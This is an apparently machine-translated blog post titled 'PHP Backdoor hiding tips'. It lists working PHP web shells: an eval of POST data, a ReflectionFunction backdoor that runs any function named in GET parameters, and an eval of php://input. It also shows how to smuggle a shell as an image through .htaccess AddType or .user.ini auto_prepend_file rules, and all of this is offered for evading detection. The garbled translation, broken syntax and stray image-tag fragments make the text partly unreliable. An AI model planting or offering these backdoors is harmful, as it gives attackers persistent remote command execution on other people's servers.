PHP Backdoor hiding tips

A word and big horse

Phpspy kitchen knife sentence <[email protected] ($_post[' cmd ');? >

Reflective rear Door

<?php

$func = new Reflectionfunction ($_get[m]);

echo $func->invokeargs (Array ($_get[c));

?>

Calls such asX.php?m=system&c=whoami
Backdoor can also bypass some detection disabledprotection systems for system functions

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/71/F3/wKioL1Xb046TwKuSAAFeKjmO5E8685.jpg "title=" 123. PNG "alt=" wkiol1xb046twkusaafekjmo5e8685.jpg "/>

Php:input

php://input is used to receive post data (here is an introduction to Php://input)

<?php

@eval (file_get_contents (' php://input '))

?>

Post Submission system (' WhoAmI ');

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/71/F7/wKiom1Xb0a-g6deDAAGsFg0VclM281.jpg "title=" 123. PNG "alt=" wkiom1xb0a-g6dedaagsfg0vclm281.jpg "/>

. htaccess ( requires webserver support )

You can set any suffixYou can also set the UTF7 encoding format shell

AddType application/x-httpd-php. jpg

and then send another one . JPG at the end of the Shell, accessed to execute the

. User.ini ( requires fastcgi coordination )

Dynamically modifying the php.ini configuration file

User.ini

Auto_prepend_file=demo.gif(ready to use php://input test not successful do not know why)

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/71/F4/wKioL1Xb1bmB5I0tAAPHUavTxYk671.jpg "style=" float: none; "title=" 123.png "alt=" Wkiol1xb1bmb5i0taaphuavtxyk671.jpg "/>

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/71/F7/wKiom1Xb06XRSXAMAAUxl_yg5-s902.jpg "style=" float: none; "title=" 222.png "alt=" Wkiom1xb06xrsxamaauxl_yg5-s902.jpg "/>

This article is from the "Sanr" blog, make sure to keep this source http://0x007.blog.51cto.com/6330498/1687963

PHP Backdoor hiding tips